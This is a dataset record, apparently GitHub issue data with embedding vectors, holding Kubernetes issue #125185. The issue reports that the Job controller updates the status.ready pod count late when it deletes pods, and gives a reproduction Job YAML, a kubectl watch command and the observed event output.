-0.005915633402764797, 0.011358016170561314, 0.021417973563075066, 0.02446029894053936, 0.02255377545952797, 0.0019048339454457164, -0.018916504457592964, -0.010465600527822971, -0.016509687528014183, -0.012493818067014217, -0.01798352599143982, -0.013264540582895279, 0.01526571437716484, 0.010323625057935715, 0.004543206188827753, -0.01167577039450407, 0.009120216593146324, 0.023040546104311943, 0.008903873153030872, -0.01376483403146267, -0.0036338891368359327, 0.01572544313967228, -0.01164872758090496, 0.010756311938166618, -0.014400341548025608, -0.009485295973718166, -0.0055302721448242664, -0.01722632348537445, -0.005425480660051107, -0.017469709739089012, -0.011750138364732265, -0.016104044392704964, 0.011412101797759533, 0.0056249224580824375, -0.004198409616947174, -0.021823616698384285, -0.0006439589196816087, 0.016442080959677696, -0.02240503951907158, -0.022012917324900627, -0.0020924441050738096, 0.0020907537546008825, -0.00486096041277051, -0.017510274425148964, 0.01016812864691019, 0.0040733362548053265, 0.008768659085035324, -0.003047396196052432, -0.0043370043858885765, 0.022242780774831772, -0.0029442952945828438, -0.011689291335642338, -0.0031673992052674294, -0.011466187424957752, -0.02969309873878956, 0.021472059190273285, -0.014170477166771889, 0.003840091172605753, 0.020512036979198456, 0.02331097610294819, 0.022837724536657333, 0.0046006725169718266, -0.025798922404646873, -0.02947675622999668, -0.011114629916846752, -0.0013318626442924142, 0.0003969812532886863, -0.012311277911067009, 0.021458538249135017, -0.011641966179013252, 0.006804668344557285, 0.005773657932877541, 0.0010960823856294155, 0.0038231892976909876, 0.018510861322283745, -0.0009329798631370068, 0.013994698412716389, -0.018199868500232697, -0.005810841917991638, 0.01818634755909443, 0.0067979078739881516, -0.00617592129856348, -0.011303930543363094, 0.002616400131955743, 0.023094631731510162, 0.0018913125386461616, 0.011601402424275875, 0.012324799783527851, -0.002440621377900243, 0.016685467213392258, 0.014170477166771889, -0.025041721761226654, 0.008349494077265263, 0.0029037308413535357, -0.0017180689610540867, 0.000583535002078861, 0.011709573678672314, 0.003600085387006402, -0.024974113330245018, 0.0064463503658771515, 0.019457362592220306, 0.01356201246380806, 0.005002935416996479, -0.015333321876823902, 0.005178714636713266, 0.001962300157174468, -0.00509758573025465, 0.008349494077265263, -0.027137545868754387, 0.016955895349383354, 0.0033550092484802008, 0.014224562793970108, -0.019917093217372894, 0.001154393539763987, -0.020674293860793114, -0.00833597220480442, -0.017145195975899696, 0.01042503584176302, 0.008099347352981567, -0.015157543122768402, 0.004309961572289467, -0.004563488531857729, -0.001714688609354198, -0.0012456633849069476, -0.025988223031163216, 0.007950611412525177, 0.004492500796914101, 0.003644030075520277, 0.005411959253251553, -0.003371911123394966, -0.02596117928624153, -0.006858754437416792, -0.0020417384803295135, -0.008714573457837105, 0.016496166586875916, -0.005665486678481102, -0.019065240398049355, 0.017645489424467087, -0.020174000412225723, -0.005327450577169657, -0.0037792446091771126, 0.0006359305698424578, 0.011952959932386875, -0.01772661879658699, 0.019065240398049355, 0.006196203175932169, -0.00021433607616927475, -0.005516750738024712, -0.006875656079500914, -0.0035290978848934174, 0.024690164253115654, 0.010675182566046715, 0.00561478128656745, -0.021837137639522552, 0.011973242275416851, 0.02385183423757553, -0.008876830339431763, -0.029017027467489243, 0.008552315644919872, 0.016644902527332306, -0.011134912259876728, -0.009302755817770958, -0.023243367671966553, 0.01426512748003006, -0.0020417384803295135, -0.017158716917037964, -0.0039854468777775764, 0.01852438412606716, 0.02020104229450226, 0.0013470741687342525, 0.0000893683172762394, -0.009181062690913677, 0.012149021029472351, 0.01893002726137638, 0.012723682448267937, 0.004184888210147619, 0.0024592133704572916, 0.018362125381827354, -0.01682068035006523, -0.00048170157242566347, 0.002770206658169627, 0.016753073781728745, 0.029801269993185997, 0.00027444312581792474, 0.01772661879658699, -0.005293646827340126, 0.015211628749966621, -0.009735442698001862, 0.013291583396494389, -0.016996460035443306, 0.006557902321219444, -0.003228245535865426, -0.009275713004171848, 0.008768659085035324, -0.005077303387224674, -0.00009554804273648188, -0.0036372693721204996, -0.020160477608442307, -0.013541730120778084, -0.002143149496987462, -0.008200758136808872, 0.0023020263761281967, 0.005195616278797388, -0.005915633402764797, -0.002376394346356392, 0.006422687787562609, 0.024838900193572044, 0.004046293441206217, 0.004384329542517662, -0.006297614425420761, -0.010384472087025642, 0.01004643552005291, -0.01787535287439823, 0.021985873579978943, 0.015955308452248573, -0.0008497384842485189, -0.0013935541501268744, -0.022323910146951675, 0.00015053174865897745, 0.02240503951907158, 0.012541142292320728, 0.007348906714469194, -0.014143434353172779, -0.012446492910385132, 0.005418720189481974, 0.0033161351457238197, -0.006476773414760828, 0.0027076699770987034, 0.008876830339431763, 0.008930915966629982, -0.003742060624063015, 0.0003044438490178436, 0.005033358931541443, 0.0295308418571949, 0.022337431088089943, 0.000019318240447319113, -0.0105467289686203, 0.021769531071186066, -0.003613606793805957, 0.010242496617138386, 0.0038907965645194054, 0.01752379536628723, -0.022432081401348114, -0.0032586688175797462, 0.010641379281878471, 0.016049958765506744, -0.006101553328335285, -0.02068781480193138, -0.0075246854685246944, -0.016401516273617744, -0.008423862047493458, -0.004614193923771381, 0.004891383461654186, 0.010134325362741947, 0.007734267972409725, 0.003454729914665222, -0.0004212775966152549, 0.01924102008342743, 0.01878129132091999, 0.003742060624063015, -0.011371537111699581, -0.0031386660411953926, 0.01554966438561678, 0.0038029071874916553, -0.004215311259031296, 0.009593467228114605, 0.007490882184356451, 0.006936502642929554, -0.01411639153957367, -0.024027612060308456, -0.004722365643829107, -0.009742203168570995, 0.005293646827340126, 0.01164872758090496, 0.0025471027474850416, -0.002641752827912569, 0.011128151789307594, 0.02366253361105919, -0.009890939109027386, -0.013994698412716389, -0.012412688694894314, 0.02390591986477375, -0.0051584322936832905, -0.004066575318574905, -0.016036437824368477, -0.012399167753756046, -0.00946501363068819, -0.006152258720248938, 0.005493088159710169, 0.011439144611358643, 0.013994698412716389, -0.0019453982822597027, 0.0016115875914692879, 0.018348604440689087, 0.0072407349944114685, 0.0008864999399520457, -0.023473232984542847, 0.010918568819761276, 0.006304374895989895, -0.0015093316324055195, -0.00037965690717101097, -0.026042308658361435, 0.006392264273017645, -0.004414752591401339, 0.017915917560458183, 0.007896525785326958, 0.005398437846451998, -0.0018963830079883337, -0.0018084936309605837, 0.009863896295428276, 0.020268650725483894, -0.017956482246518135, 0.011547315865755081, 0.01024925708770752, 0.01155407726764679, 0.005266604013741016, 0.017997046932578087, 0.0022563915699720383, 0.0011358015472069383, -0.010681943967938423, -0.010844200849533081, 0.009512338787317276, 0.01696941629052162, 0.012243670411407948, 0.012446492910385132, 0.0018828616011887789, 0.020958242937922478, 0.0010479121701791883, 0.002313857665285468, 0.012595228850841522, -0.0008581893634982407, 0.0024372409097850323, -0.018402690067887306, -0.0029459854122251272, 0.012088174000382423, -0.003971925470978022, 0.019416797906160355, -0.0036271284334361553, 0.017997046932578087, -0.012155781500041485, -0.008856547996401787, -0.011871831491589546, -0.0035054353065788746, 0.01737505942583084, 0.008423862047493458, -0.012865656986832619, 0.005242941435426474, -0.00946501363068819, 0.010283061303198338, 0.03610226511955261, -0.0013225666480138898, -0.013724269345402718, 0.01275748573243618, 0.011946199461817741, 0.019700748845934868, -0.028665469959378242, 0.008498230017721653, -0.013697226531803608, -0.03188357502222061, -0.01672603003680706, 0.0005171953816898167, -0.010384472087025642, 0.017888875678181648, 0.016644902527332306, -0.011418862268328667, 0.009701638482511044, -0.04270073026418686, 0.007741028908640146, -0.00037965690717101097, 0.014981764368712902, -0.01733449660241604, -0.027191631495952606, 0.001095237210392952, 0.006551141384989023, 0.013954133726656437, -0.026529081165790558, 0.025596100836992264, -0.0065342397429049015, -0.008376536890864372, -0.002905420958995819, -0.016144609078764915, -0.004485740326344967, 0.014156955294311047, -0.008268365636467934, -0.00824132189154625, -0.02853025496006012, 0.012007045559585094, 0.006409166380763054, -0.0012803120771422982, -0.03675129637122154, -0.011669008992612362, 0.0017113082576543093, 0.0033026135060936213, 0.0049826535396277905, 0.0126357926055789, 0.022418560460209846, -0.007964132353663445, 0.010012632235884666, -0.023135196417570114, 0.02120162919163704, -0.017037024721503258, 0.009539381600916386, 0.03583183512091637, -0.00772074656561017, -0.01252762135118246, -0.01893002726137638, 0.013372711837291718, 0.013453840278089046, -0.02706993743777275, 0.006662693340331316, 0.009634031914174557, 0.007592292968183756, -0.005215898621827364, 0.008741616271436214, -0.004032771568745375, 0.011161955073475838, 0.015509100630879402, -0.0004584615817293525, -0.012507339008152485, -0.025988223031163216, -0.013690466061234474, -0.0101951714605093, -0.024676641449332237, 0.01737505942583084, -0.002670485991984606, 0.00048719465848989785, -0.0061556389555335045, 0.012629032135009766, 0.023135196417570114, -0.002890209434553981, 0.024338604882359505, 0.03431743383407593, 0.00629085348919034, -0.00748412124812603, -0.017537318170070648, -0.007876243442296982, -0.006060989107936621, -0.041213370859622955, -0.006182681769132614, 0.003458110149949789, -0.005658725742250681, -0.01672603003680706, -0.022972939535975456, 0.004827156662940979, 0.002885138848796487, -0.033425018191337585, 0.015306279063224792, 0.012209867127239704, 0.007233974523842335, 0.019552012905478477, -0.03017987124621868, 0.009512338787317276, 0.016685467213392258, 0.00899176299571991, 0.011290408670902252, 0.0016149679431691766, 0.005269984249025583, 0.007409753277897835, -0.002200615592300892, 0.00596633879467845, -0.005002935416996479, 0.008890352211892605, -0.00614211754873395, -0.0017358158947899938, -0.005033358931541443, 0.007849200628697872, -0.005858167074620724, 0.0034074047580361366, 0.011892112903296947, 0.013859483413398266, 0.017064066603779793, 0.02958492748439312, 0.00591225316748023, -0.007166367489844561, 0.0034614906180649996, -0.0018608892569318414, 0.0022428701631724834, 0.004664899315685034, -0.0016073620645329356, 0.002001174259930849, -0.01429217029362917, -0.012135499157011509, -0.0012270713923498988, 0.05154375731945038, 0.00031268346356227994, 0.013230736367404461, 0.02139092981815338, -0.007605814374983311, -0.0203903429210186, -0.013196933083236217, 0.0038096678908914328, -0.011885352432727814, -0.0017577882390469313, -0.0031048625241965055, -0.01696941629052162, 0.017348017543554306, -0.013724269345402718, 0.004624335095286369, 0.003498674603179097, -0.006409166380763054, -0.02014695666730404, -0.01170281320810318, 0.0034412085078656673, 0.0018558186711743474, -0.01964666321873665, -0.006892557721585035, 0.015847137197852135, -0.030369171872735023, 0.020160477608442307, 0.016698988154530525, -0.011925917118787766, 0.008870069868862629, -0.028097568079829216, 0.009093173779547215, -0.013690466061234474, 0.006060989107936621, -0.001252424088306725, 0.009505577385425568, 0.010418275371193886, -0.021958831697702408, 0.02370309829711914, 0.0025268206372857094, -0.005188855342566967, 0.03088298626244068, -0.0042389738373458385, -0.01663137972354889, -0.009945024736225605, 0.001756098004989326, 0.013981176540255547, 0.007497642654925585, 0.009181062690913677, 0.00754496781155467, 0.004009109456092119, -0.009106694720685482, 0.011574359610676765, -0.003829950001090765, 0.0034614906180649996, -0.01943032070994377, -0.004499261733144522, 0.006828330922871828, -0.0007322708843275905, -0.025690751150250435, 0.003924600314348936, -0.0009819951374083757, -0.01293326448649168, 0.005337591283023357, 0.0009059369913302362, -0.019065240398049355, 0.007950611412525177, 0.020931201055645943, -0.0028259826358407736, -0.012574946507811546, 0.026813030242919922, 0.02516341395676136, 0.001415526494383812, -0.03702172264456749, 0.005956197623163462, -0.020823029801249504, -0.00803850032389164, 0.02817869745194912, -0.002342590829357505, -0.027610795572400093, 0.014535556547343731, -0.005550554487854242, -0.0038029071874916553, -0.002073852112516761, 0.00033275436726398766, -0.011256605386734009, -0.01494119968265295, 0.006608607713133097, -0.01358905527740717, -0.009796288795769215, 0.01944384165108204, 0.028746597468852997, 0.02090415731072426, -0.01944384165108204, -0.016712509095668793, -0.020417386665940285, -0.0009997420711442828, -0.010093760676681995, 0.00177638023160398, 0.004316722042858601, -0.011290408670902252, -0.0012896080734208226, -0.00017165900499094278, -0.008281886577606201, 0.0022868148516863585, 0.0011780561180785298, 0.013054957613348961, 0.00733538530766964, -0.011053783819079399, -0.0017358158947899938, 0.018754247575998306, 0.02103937231004238, 0.0003006409388035536, -0.006480153650045395, 0.02124219387769699, -0.000766919634770602, 0.01411639153957367, -0.006304374895989895, 0.014278648421168327, -0.013534968718886375, 0.013027914799749851, -0.016536731272935867, -0.009965307079255581, 0.01444090623408556, 0.020403863862156868, 0.003998968284577131, 0.0009870657231658697, 0.006453110836446285, 0.010614336468279362, 0.0021803334821015596, 0.0042389738373458385, -0.023784225806593895, -0.01678011566400528, 0.0053612538613379, 0.007997936569154263, 0.008329211734235287, 0.025501450523734093, 0.01449499186128378, 0.03274894505739212, 0.004407992120832205, -0.013994698412716389, -0.0012591847917065024, 0.04486416280269623, -0.010675182566046715, -0.016888288781046867, -0.03150497376918793, 0.012196346186101437, -0.00311500346288085, 0.011236323043704033, -0.016090523451566696, -0.010059957392513752, 0.014481469988822937, -0.002254701452329755, 0.007538206875324249, -0.01887594163417816, -0.01406230591237545, 0.027191631495952606, -0.021012330427765846, 0.010979415848851204, -0.0061623998917639256, -0.0013859483879059553, -0.007125802803784609, 0.0027465440798550844, -0.005523511208593845, -0.0011087587336078286, 0.00023197733389679343, -0.0027769673615694046, -0.009045848622918129, 0.001828775741159916, 0.007342146243900061, -0.0033989539369940758, -0.028854768723249435, -0.02836799807846546, -0.010999697260558605, -0.0033550092484802008, 0.006625509355217218, 0.002001174259930849, 0.006676214747130871, -0.01461668498814106, -0.007463838905096054, 0.002920632716268301, -0.008085825480520725, -0.00818723626434803, -0.023216325789690018, 0.02771896682679653, -0.018402690067887306, -0.0010969274444505572, -0.016293345019221306, 0.017604924738407135, -0.0015634173760190606, -0.0025825966149568558, 0.023716619238257408, 0.0023932962212711573, -0.0008873449987731874, -0.020606685429811478, -0.0022175174672156572, -0.004053053911775351, 0.028962939977645874, 0.010445318184792995, 0.01833508349955082, -0.008261604234576225, 0.013149607926607132, -0.017713095992803574, 0.0034564200323075056, 0.029071113094687462 ]
null
null
null
null
null
null
null
null
null
[ "kubernetes", "kubernetes" ]
### What happened? When Job controller is deleting pods the counter in the status.ready field does not reflect this properly (there is a delay until the cache is refreshed). This affects the scenarios of terminating job, suspended job, and excess pods deleted. ### What did you expect to happen? The ready field is updated as soon as the delete requests are sent successfully, in sync with the status.active field. ### How can we reproduce it (as minimally and precisely as possible)? 1. To see this you can scale down a job, use the following yaml: ```yaml apiVersion: batch/v1 kind: Job metadata: name: simple-job spec: completions: 2 parallelism: 2 completionMode: Indexed template: spec: restartPolicy: Never containers: - name: 'worker' image: python command: - python3 - -c - | import time time.sleep(300) ``` 2. Watch for the job updates with the following watcher: ``` kubectl get jobs -w --output-watch-events -ocustom-columns=EVENT:.type,NAME:.object.metadata.name,READY:.object.status.ready,ACTIVE:.object.status.active,TERMINATING:.object.status.terminating,CONDITIONS:.object.status.conditions | ts "%Y-%m-%d %H:%M:%.S"` ``` 3. Scale down the job by `kubectl edit job` and decrease parallelism and completions to 1. We observe events like the following ``` 2024-05-29 12:49:58.790101 ADDED simple-job <none> <none> <none> <none> 2024-05-29 12:49:58.810008 MODIFIED simple-job 0 2 0 <none> 2024-05-29 12:50:02.065710 MODIFIED simple-job 2 2 0 <none> 2024-05-29 12:50:17.526562 MODIFIED simple-job 2 2 0 <none> 2024-05-29 12:50:17.542893 MODIFIED simple-job 2 1 0 <none> 2024-05-29 12:50:18.537404 MODIFIED simple-job 1 1 1 <none> 2024-05-29 12:50:48.785143 MODIFIED simple-job 1 1 0 <none> 2024-05-29 12:55:01.515515 MODIFIED simple-job 0 1 0 <none> 2024-05-29 12:55:02.519571 MODIFIED simple-job 0 <none> 0 <none> 2024-05-29 12:55:02.529433 MODIFIED simple-job 0 <none> 0 [map[lastProbeTime:2024-05-29T10:55:02Z lastTransitionTime:2024-05-29T10:55:02Z status:True type:Complete]] ``` Note that for one update at `2024-05-29 12:50:17.542893` ready is `2` while `active` is already `1`. We can set `ready` to `1` at this point already. Note that the pod was terminating for around 30s. Also note, that the event at `2024-05-29 12:50:17.542893` has `terminating=0`. This value could be set to `1` already, and this is being addressed in https://github.com/kubernetes/kubernetes/issues/125089. ### Anything else we need to know? This is related to https://github.com/kubernetes/kubernetes/issues/123775. We need this fix to be able to re-introduce the validation rule that `ready <= active` which was withdrawn here: https://github.com/kubernetes/kubernetes/pull/123792. The culprit of the issue is that we determine the count of ready pods by filtering active pods [here](https://github.com/kubernetes/kubernetes/blob/afebfdc5d411859468153e2b9921915f3e4f9ff4/pkg/controller/job/job_controller.go#L832). However, the count of active pods might be changed later. **Note that**: This issue is slightly more complex than https://github.com/kubernetes/kubernetes/pull/123792. We cannot unconditionally decrement the counter for ready pods based on the number of successfully deleted pods. The functions deleting pods should probably also return the counters of successfully deleted ready pods (along with the count of successfully deleted pods). ### Kubernetes version <details> 1.30 </details> ### Cloud provider <details> Kind </details> ### OS version <details> ```console # On Linux: $ cat /etc/os-release # paste output here $ uname -a # paste output here # On Windows: C:\> wmic os get Caption, Version, BuildNumber, OSArchitecture # paste output here ``` </details> ### Install tools <details> </details> ### Container runtime (CRI) and version (if applicable) <details> </details> ### Related plugins (CNI, CSI, ...) and versions (if applicable) <details> </details>
Job controller reports the count of ready pods with unnecessary delay
https://api.github.com/repos/kubernetes/kubernetes/issues/125185/comments
4
2024-05-29T11:03:51
2024-06-21T00:15:29Z
https://github.com/kubernetes/kubernetes/issues/125185
2,323,032,339
125,185
false
This is a GitHub Issue repo:kubernetes owner:kubernetes Title : Job controller reports the count of ready pods with unnecessary delay Issue date: --- start body --- ### What happened? When Job controller is deleting pods the counter in the status.ready field does not reflect this properly (there is a delay until the cache is refreshed). This affects the scenarios of terminating job, suspended job, and excess pods deleted. ### What did you expect to happen? The ready field is updated as soon as the delete requests are sent successfully, in sync with the status.active field. ### How can we reproduce it (as minimally and precisely as possible)? 1. To see this you can scale down a job, use the following yaml: ```yaml apiVersion: batch/v1 kind: Job metadata: name: simple-job spec: completions: 2 parallelism: 2 completionMode: Indexed template: spec: restartPolicy: Never containers: - name: 'worker' image: python command: - python3 - -c - | import time time.sleep(300) ``` 2. Watch for the job updates with the following watcher: ``` kubectl get jobs -w --output-watch-events -ocustom-columns=EVENT:.type,NAME:.object.metadata.name,READY:.object.status.ready,ACTIVE:.object.status.active,TERMINATING:.object.status.terminating,CONDITIONS:.object.status.conditions | ts "%Y-%m-%d %H:%M:%.S"` ``` 3. Scale down the job by `kubectl edit job` and decrease parallelism and completions to 1. We observe events like the following ``` 2024-05-29 12:49:58.790101 ADDED simple-job <none> <none> <none> <none> 2024-05-29 12:49:58.810008 MODIFIED simple-job 0 2 0 <none> 2024-05-29 12:50:02.065710 MODIFIED simple-job 2 2 0 <none> 2024-05-29 12:50:17.526562 MODIFIED simple-job 2 2 0 <none> 2024-05-29 12:50:17.542893 MODIFIED simple-job 2 1 0 <none> 2024-05-29 12:50:18.537404 MODIFIED simple-job 1 1 1 <none> 2024-05-29 12:50:48.785143 MODIFIED simple-job 1 1 0 <none> 2024-05-29 12:55:01.515515 MODIFIED simple-job 0 1 0 <none> 2024-05-29 12:55:02.519571 MODIFIED simple-job 0 <none> 0 <none> 2024-05-29 12:55:02.529433 MODIFIED simple-job 0 <none> 0 [map[lastProbeTime:2024-05-29T10:55:02Z lastTransitionTime:2024-05-29T10:55:02Z status:True type:Complete]] ``` Note that for one update at `2024-05-29 12:50:17.542893` ready is `2` while `active` is already `1`. We can set `ready` to `1` at this point already. Note that the pod was terminating for around 30s. Also note, that the event at `2024-05-29 12:50:17.542893` has `terminating=0`. This value could be set to `1` already, and this is being addressed in https://github.com/kubernetes/kubernetes/issues/125089. ### Anything else we need to know? This is related to https://github.com/kubernetes/kubernetes/issues/123775. We need this fix to be able to re-introduce the validation rule that `ready <= active` which was withdrawn here: https://github.com/kubernetes/kubernetes/pull/123792. The culprit of the issue is that we determine the count of ready pods by filtering active pods [here](https://github.com/kubernetes/kubernetes/blob/afebfdc5d411859468153e2b9921915f3e4f9ff4/pkg/controller/job/job_controller.go#L832). However, the count of active pods might be changed later. **Note that**: This issue is slightly more complex than https://github.com/kubernetes/kubernetes/pull/123792. We cannot unconditionally decrement the counter for ready pods based on the number of successfully deleted pods. The functions deleting pods should probably also return the counters of successfully deleted ready pods (along with the count of successfully deleted pods). ### Kubernetes version <details> 1.30 </details> ### Cloud provider <details> Kind </details> ### OS version <details> ```console # On Linux: $ cat /etc/os-release # paste output here $ uname -a # paste output here # On Windows: C:\> wmic os get Caption, Version, BuildNumber, OSArchitecture # paste output here ``` </details> ### Install tools <details> </details> ### Container runtime (CRI) and version (if applicable) <details> </details> ### Related plugins (CNI, CSI, ...) and versions (if applicable) <details> </details> --- end body ---
4,591
[ 0.0039949435740709305, -0.038563795387744904, -0.004847796633839607, 0.00830604787915945, -0.014691712334752083, -0.009703399613499641, -0.006612051278352737, 0.03275580704212189, -0.0015144485514611006, 0.002595640020444989, 0.03628431633114815, -0.0018120689783245325, 0.004473087843507528, 0.0023458339273929596, -0.01443410012871027, 0.0319751612842083, -0.023762790486216545, 0.02992987632751465, 0.0005903617129661143, -0.023107049986720085, -0.014566809870302677, 0.02932097390294075, 0.004465281497687101, 0.060921426862478256, 0.01853247918188572, 0.0025546562392264605, -0.011967265978455544, 0.018875962123274803, -0.0561751127243042, -0.013372424989938736, 0.0004520414222497493, 0.012888425961136818, 0.02402820996940136, 0.015253775753080845, 0.051522478461265564, 0.0166120957583189, 0.035784702748060226, 0.03372380509972572, 0.003290412714704871, -0.04530855640769005, -0.03981282189488411, 0.007345856167376041, -0.0356910265982151, 0.024043822661042213, -0.023013373836874962, 0.028836974874138832, 0.005210795905441046, -0.013075780123472214, -0.04618287459015846, 0.003546073567122221, -0.0014929808676242828, -0.033598899841308594, 0.0018169479444622993, -0.0065183741971850395, 0.00010550886509008706, -0.05236557126045227, -0.0023399791680276394, -0.004418442957103252, -0.03100716322660446, 0.0007396598230116069, 0.022747954353690147, 0.0266511719673872, -0.019453639164566994, 0.023731565102934837, 0.02960200607776642, 0.007486372254788876, -0.05136634781956673, 0.024324854835867882, -0.050991639494895935, -0.01293526403605938, -0.0365028940141201, -0.008665143512189388, 0.01807970553636551, 0.010593333281576633, 0.07081998884677887, -0.041311658918857574, 0.015308421105146408, 0.0062373424880206585, 0.004262314178049564, -0.012263910844922066, -0.033973608165979385, 0.010039077140390873, -0.021670665591955185, 0.006549599580466747, 0.026713624596595764, 0.00796646811068058, -0.024043822661042213, -0.046557582914829254, 0.015878289937973022, 0.020655829459428787, -0.03584715351462364, -0.010897784493863583, 0.0017183917807415128, -0.049680158495903015, -0.008352886885404587, 0.022045375779271126, 0.0061983102932572365, 0.011967265978455544, -0.04178004711866379, -0.050835512578487396, -0.05430156737565994, -0.025417756289243698, -0.002138963434845209, -0.003710008691996336, 0.027494268491864204, -0.011155396699905396, -0.0025097692850977182, -0.03124135732650757, 0.015105453319847584, 0.11185061186552048, 0.038688696920871735, -0.006889179814606905, -0.07263108342885971, -0.02866523340344429, -0.054926082491874695, 0.037783149629831314, 0.012263910844922066, 0.0190633162856102, 0.00549573078751564, 0.033192966133356094, 0.028321750462055206, 0.012006298638880253, 0.013825197704136372, 0.00792743545025587, -0.014582422561943531, 0.017205385491251945, 0.020187443122267723, 0.01398132648319006, -0.02251376211643219, -0.02841542661190033, -0.016253000125288963, -0.0200937669724226, -0.03186587244272232, -0.011452041566371918, 0.025651948526501656, -0.006877470295876265, 0.005409860052168369, 0.07743984460830688, -0.018969640135765076, -0.022669890895485878, -0.028056330978870392, -0.07306823879480362, 0.05761149898171425, -0.00797817762941122, 0.0030581713654100895, 0.0017837706254795194, 0.0030776874627918005, 0.016253000125288963, 0.020577766001224518, 0.0067603737115859985, -0.024106275290250778, -0.022576212882995605, 0.008618305437266827, 0.017564481124281883, 0.03083542175590992, -0.03300561010837555, -0.025979818776249886, -0.005124925170093775, -0.006010955665260553, 0.022826019674539566, -0.012966490350663662, -0.0209212489426136, -0.003173316130414605, -0.02985181100666523, -0.032537225633859634, -0.010858752764761448, -0.011475460603833199, 0.01586267724633217, -0.02099931240081787, 0.014996163547039032, -0.01548016257584095, -0.014215519651770592, -0.01013275422155857, 0.013239715248346329, -0.008665143512189388, 0.0015066422056406736, 0.03391115739941597, 0.034754253923892975, 0.005921181757003069, 0.0032045419793576, -0.015058615244925022, 0.03325541689991951, -0.05467627942562103, -0.050086092203855515, 0.05957872048020363, -0.03185025975108147, -0.025901755318045616, 0.0014383358648046851, 0.0016110532451421022, 0.0100468834862113, 0.008337273262441158, -0.0019018430029973388, 0.041686367243528366, -0.00009074981790035963, -0.0305543914437294, 0.013255327939987183, 0.022029763087630272, -0.03793928027153015, -0.008594886399805546, -0.029086779803037643, 0.005160054191946983, -0.019000865519046783, -0.021795568987727165, -0.006038278341293335, -0.02004692703485489, 0.012396620586514473, -0.0090242400765419, 0.009664367884397507, 0.03915708139538765, -0.00005336430695024319, 0.0032221064902842045, -0.02160821482539177, 0.03634676709771156, -0.0018325608689337969, 0.02879013679921627, 0.02821245975792408, 0.012591781094670296, 0.022607438266277313, -0.023528598248958588, -0.011459847912192345, 0.010866559110581875, -0.030445100739598274, -0.006210019811987877, -0.010562107898294926, -0.019547315314412117, -0.025230400264263153, -0.0003571444540284574, -0.05024222284555435, 0.01689312793314457, -0.010484043508768082, 0.024902530014514923, -0.002720542950555682, 0.013333392329514027, -0.005800181999802589, -0.0037939278408885, 0.0018091415986418724, -0.008688563480973244, 0.0011719411704689264, -0.006639373954385519, -0.03990650177001953, 0.032131291925907135, 0.01651841774582863, -0.0323810949921608, -0.032287418842315674, -0.013723714277148247, 0.012045330367982388, -0.0016139806248247623, 0.024543434381484985, 0.00959410984069109, 0.03219374269247055, -0.02001570165157318, 0.006163181271404028, -0.012708878144621849, -0.03809540718793869, 0.011733073741197586, 0.009406755678355694, 0.016721386462450027, 0.02042163722217083, 0.03662779927253723, 0.013302166946232319, 0.054645050317049026, 0.01759570650756359, -0.05245925113558769, 0.021139828488230705, 0.01109294593334198, -0.03887605294585228, 0.0032747997902333736, 0.04396584630012512, 0.011459847912192345, 0.0008479740936309099, 0.022420084103941917, 0.012185846455395222, -0.03325541689991951, -0.015558226965367794, 0.007365372497588396, -0.004906345158815384, -0.012068750336766243, 0.010171785950660706, 0.015347452834248543, 0.03522263839840889, 0.004395023453980684, 0.025027433410286903, 0.02743181586265564, 0.032006386667490005, -0.03391115739941597, -0.0036807346623390913, 0.009640948846936226, -0.07250617444515228, -0.036721475422382355, -0.006057794205844402, -0.03216251730918884, -0.011967265978455544, 0.03800173103809357, 0.02324756607413292, 0.0015495775733143091, -0.011459847912192345, -0.03369257599115372, 0.0405934676527977, -0.030320197343826294, -0.019016478210687637, -0.01673699915409088, -0.018875962123274803, 0.04290417209267616, 0.011202235706150532, -0.02193608507514, -0.0162061620503664, -0.028805749490857124, 0.021686280146241188, -0.043778494000434875, 0.021826794371008873, -0.004160830285400152, -0.03459812328219414, 0.03965669497847557, -0.051897186785936356, -0.0032669934444129467, 0.026026656851172447, 0.003952008206397295, -0.014910292811691761, -0.04621409997344017, -0.026744849979877472, 0.03328664228320122, 0.0009889778448268771, -0.035285089164972305, 0.0340360626578331, 0.0007821072940714657, -0.018875962123274803, -0.026760462671518326, 0.010811913758516312, -0.025886142626404762, -0.020390409976243973, -0.004660442471504211, 0.005554279312491417, -0.02485569193959236, -0.015566033311188221, -0.0052225058898329735, -0.05277150869369507, -0.024324854835867882, 0.020281121134757996, 0.05311499163508415, -0.044028300791978836, -0.021295957267284393, -0.025495819747447968, -0.0023263178300112486, 0.02238885872066021, 0.015199131332337856, -0.039875276386737823, -0.028196847066283226, 0.021092990413308144, 0.04071836918592453, 0.009820496663451195, 0.0014500454999506474, -0.011764299124479294, -0.029461489990353584, -0.0017213191604241729, 0.046026747673749924, 0.01734590157866478, -0.044715266674757004, 0.02004692703485489, 0.06707289814949036, -0.013161650858819485, 0.02440291829407215, -0.06938360631465912, -0.0344419963657856, 0.03806418180465698, 0.010421591810882092, 0.01828267239034176, -0.015792420133948326, -0.01598758064210415, -0.03575347736477852, -0.012443458661437035, 0.002788849174976349, 0.005608924198895693, -0.006327116396278143, 0.03378625586628914, -0.0172209981828928, -0.007786919828504324, -0.043934620916843414, 0.02099931240081787, -0.03164729103446007, 0.020733894780278206, -0.014746357686817646, 0.018267059698700905, 0.03519141301512718, -0.017330287024378777, -0.021826794371008873, 0.05420789122581482, -0.01398132648319006, 0.012615200132131577, 0.00789230689406395, 0.011389589868485928, -0.0459330677986145, 0.04293539747595787, -0.042373333126306534, -0.034504447132349014, -0.019281897693872452, 0.023512985557317734, 0.010975848883390427, -0.019203832373023033, 0.00267565599642694, -0.010952429845929146, 0.005148344673216343, 0.027712848037481308, 0.058954205363988876, 0.03244354948401451, -0.03437954559922218, 0.013637843541800976, -0.019250670447945595, -0.012373200617730618, 0.011280300095677376, -0.010343527421355247, 0.004781442228704691, 0.005991439800709486, -0.056737177073955536, 0.010546495206654072, 0.01031230203807354, 0.0049414741806685925, 0.017049256712198257, -0.0015817790990695357, -0.04053101688623428, 0.0034777673427015543, -0.028056330978870392, 0.006900889333337545, -0.015589452348649502, 0.03597205877304077, 0.0002060167316813022, -0.018626157194375992, 0.007490275427699089, 0.005277150776237249, 0.019406799226999283, -0.018954027444124222, -0.019750282168388367, 0.01338803768157959, 0.01636228896677494, -0.00653008371591568, -0.018188996240496635, 0.012224879115819931, 0.024434145539999008, -0.031194517388939857, -0.002060899045318365, -0.0060265688225626945, -0.017767447978258133, 0.00424279784783721, 0.01608125865459442, 0.018688607960939407, -0.0014588277554139495, -0.04093695059418678, -0.04518365114927292, -0.0037275732029229403, -0.02518356218934059, 0.004395023453980684, -0.045495908707380295, 0.020733894780278206, -0.028680846095085144, 0.003456299426034093, 